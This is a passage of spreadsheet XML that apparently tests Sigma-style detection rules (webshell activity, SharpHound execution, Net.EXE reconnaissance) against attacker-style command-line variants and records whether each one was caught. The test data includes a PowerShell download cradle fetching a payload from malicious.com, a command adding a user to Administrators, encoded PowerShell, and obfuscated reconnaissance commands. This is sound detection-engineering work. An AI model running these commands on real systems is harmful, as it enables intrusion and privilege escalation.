      <c r="A1098" s="43" t="n"/>
      <c r="B1098" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1098" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1098" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1098" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F1098" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1098" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1098" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1098" s="43" t="n"/>
      <c r="J1098" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1098" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1099" ht="15.75" customHeight="1" s="42">
      <c r="A1099" s="36" t="n"/>
      <c r="B1099" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1099" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1099" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1099" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F1099" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1099" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1099" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1099" s="43" t="n"/>
      <c r="J1099" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1099" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1100" ht="15.75" customHeight="1" s="42">
      <c r="A1100" s="36" t="n"/>
      <c r="B1100" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1100" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1100" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1100" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1100" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1100" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1100" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1100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100" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1100" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1101" ht="15.75" customHeight="1" s="42">
      <c r="A1101" s="43" t="n"/>
      <c r="B1101" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1101" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1101" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1101" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -cOmMaNd "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1101" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1101" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1101" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1101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101" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1101" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1102" ht="15.75" customHeight="1" s="42">
      <c r="A1102" s="43" t="n"/>
      <c r="B1102" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1102" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1102" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1102" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOpRoFiLE -COmmAnD "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1102" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1102" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1102" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1102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102" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1102" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1103" ht="15.75" customHeight="1" s="42">
      <c r="A1103" s="43" t="n"/>
      <c r="B1103" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1103" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1103" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1103" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nopRoFIle -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1103" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1103" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1103" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1103" s="36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103" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1103" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1104" ht="15.75" customHeight="1" s="42">
      <c r="A1104" s="43" t="n"/>
      <c r="B1104" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1104" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1104" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1104" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noprOFiLe -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1104" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1104" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1104" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1104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104" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1104" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1105" ht="15.75" customHeight="1" s="42">
      <c r="A1105" s="43" t="n"/>
      <c r="B1105" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1105" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1105" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1105" s="36" t="inlineStr">
        <is>
          <t>ping.exe /n 4 10.10.10.10</t>
        </is>
      </c>
      <c r="F1105" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1105" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1105" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1105" s="43" t="n"/>
      <c r="J1105" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1105" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1106" ht="15.75" customHeight="1" s="42">
      <c r="A1106" s="43" t="n"/>
      <c r="B1106" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1106" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1106" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1106" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F1106" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1106" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1106" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1106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106" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1106" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1107" ht="15.75" customHeight="1" s="42">
      <c r="A1107" s="43" t="n"/>
      <c r="B1107" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1107" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1107" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1107" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eC JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F1107" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1107" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1107" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1107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107" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1107" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1108" ht="15.75" customHeight="1" s="42">
      <c r="A1108" s="43" t="n"/>
      <c r="B1108" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1108" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1108" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1108" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F1108" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1108" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1108" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1108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108" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1108" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1109" ht="15.75" customHeight="1" s="42">
      <c r="A1109" s="43" t="n"/>
      <c r="B1109" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1109" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1109" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1109" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe -"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F1109" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1109" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1109" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1109" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J1109" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1109" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1110" ht="15.75" customHeight="1" s="42">
      <c r="A1110" s="43" t="n"/>
      <c r="B1110" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1110" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1110" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1110" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F1110" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1110" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1110" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1110" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J1110" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1110" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1111" ht="15.75" customHeight="1" s="42">
      <c r="A1111" s="43" t="n"/>
      <c r="B1111" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1111" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1111" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1111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1111" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1111" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1111" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I111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11" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1111" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1112" ht="15.75" customHeight="1" s="42">
      <c r="A1112" s="43" t="n"/>
      <c r="B1112" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1112" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1112" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1112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1112" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1112" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1112" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1112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12" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1112" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1113" ht="15.75" customHeight="1" s="42">
      <c r="A1113" s="43" t="n"/>
      <c r="B1113" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1113" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1113" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1113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1113" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1113" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1113" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1113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13" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1113" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1114" ht="15.75" customHeight="1" s="42">
      <c r="A1114" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1114" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1114" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1114" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1114" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F1114" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1114" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1114" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1114" s="36" t="n"/>
      <c r="J1114" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1114" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1115" ht="15.75" customHeight="1" s="42">
      <c r="A1115" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1115" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1115" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1115" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1115" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F1115" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1115" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1115" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1115" s="43" t="n"/>
      <c r="J1115" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1115" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1116" ht="15.75" customHeight="1" s="42">
      <c r="A1116" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1116" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1116" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1116" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1116" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F1116" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1116" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1116" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1116" s="43" t="n"/>
      <c r="J1116" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1116" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1117" ht="15.75" customHeight="1" s="42">
      <c r="A1117" s="43" t="n"/>
      <c r="B1117" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1117" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1117" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1117" s="36" t="inlineStr">
        <is>
          <t>net user /domain</t>
        </is>
      </c>
      <c r="F1117" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1117" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1117" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1117" s="36" t="n"/>
      <c r="J1117" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1117" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1118" ht="15.75" customHeight="1" s="42">
      <c r="A1118" s="43" t="n"/>
      <c r="B1118" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1118" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1118" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1118" s="36" t="inlineStr">
        <is>
          <t>net loc^algroup administrators /Do</t>
        </is>
      </c>
      <c r="F1118" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1118" s="36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118" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1118" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1119" ht="15.75" customHeight="1" s="42">
      <c r="A1119" s="43" t="n"/>
      <c r="B1119" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1119" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1119" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1119" s="36" t="inlineStr">
        <is>
          <t>net loc^algroup administrators /DO</t>
        </is>
      </c>
      <c r="F1119" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1119" s="36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119" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1119" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1120" ht="15.75" customHeight="1" s="42">
      <c r="A1120" s="43" t="n"/>
      <c r="B1120" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1120" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1120" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1120" s="36" t="inlineStr">
        <is>
          <t>net loc^algroup administrators /dO</t>
        </is>
      </c>
      <c r="F1120" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1120" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1120" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1120" s="4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120" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1120" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1121" ht="15.75" customHeight="1" s="42">
      <c r="A1121" s="43" t="n"/>
      <c r="B1121" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1121" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1121" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1121" s="36" t="inlineStr">
        <is>
          <t>net localgroup "admin" istrators -"do"</t>
        </is>
      </c>
      <c r="F1121" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1121" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1121" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1121" s="43" t="n"/>
      <c r="J1121" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1121" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1122" ht="15.75" customHeight="1" s="42">
      <c r="A1122" s="43" t="n"/>
      <c r="B1122" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1122" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1122" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1122" s="36" t="inlineStr">
        <is>
          <t>net localgroup "admin" istrators /"do"</t>
        </is>
      </c>
      <c r="F1122" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1122" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1122" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1122" s="43" t="n"/>
      <c r="J1122" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1122" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1123" ht="15.75" customHeight="1" s="42">
      <c r="A1123" s="43" t="n"/>
      <c r="B1123" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1123" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1123" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1123" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F1123" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1123" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1123" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1123" s="43" t="n"/>
      <c r="J1123" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1123" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1124" ht="15.75" customHeight="1" s="42">
      <c r="A1124" s="43" t="n"/>
      <c r="B1124" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1124" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1124" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1124" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F1124" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1124" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1124" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1124" s="43" t="n"/>
      <c r="J1124" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1124" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1125" ht="15.75" customHeight="1" s="42">
      <c r="A1125" s="43" t="n"/>
      <c r="B1125" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1125" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1125" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1125" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F1125" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1125" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1125" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1125" s="43" t="n"/>
      <c r="J1125" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1125" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1126" ht="15.75" customHeight="1" s="42">
      <c r="A1126" s="43" t="n"/>
      <c r="B1126" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1126" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1126" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1126" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmAnD "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F1126" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1126" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1126" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1126" s="36" t="n"/>
      <c r="J1126" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1126" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1127" ht="15.75" customHeight="1" s="42">
      <c r="A1127" s="43" t="n"/>
      <c r="B1127" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1127" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1127" s="36" t="inlineStr">
        <is>
